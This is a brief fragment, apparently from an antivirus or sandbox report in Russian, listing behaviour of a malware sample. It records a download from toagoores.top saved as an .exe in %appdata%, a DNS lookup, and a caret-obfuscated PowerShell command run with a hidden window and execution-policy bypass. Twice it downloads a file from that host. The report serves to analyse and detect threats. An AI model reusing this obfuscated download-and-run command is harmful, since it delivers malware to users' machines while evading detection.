Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^wER^sHELL^.eXE^ -^e^Xe^Cu^TIonPO^l^ICY bypAss -N^oProfILe -WiND^OwSTY^lE^ hiDDeN (^neW^-^O^B^Je^Ct S^ySTe^M^.Ne^T.^W^e^bCliEn^T).dowN^LOad^File(^'http://toagoores.top/r...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "Po^wER^sHELL^.eXE^ -^e^Xe^Cu^TIonPO^l^ICY bypAss -N^oProfILe -WiND^OwSTY^lE^ hiDDeN (^neW^-^O^B^Je^Ct S^ySTe^M^.Ne^T.^W^e^bCliEn^T).dowN^LOad^File(^'http://toagoores.top/r...' (со скрытым окном)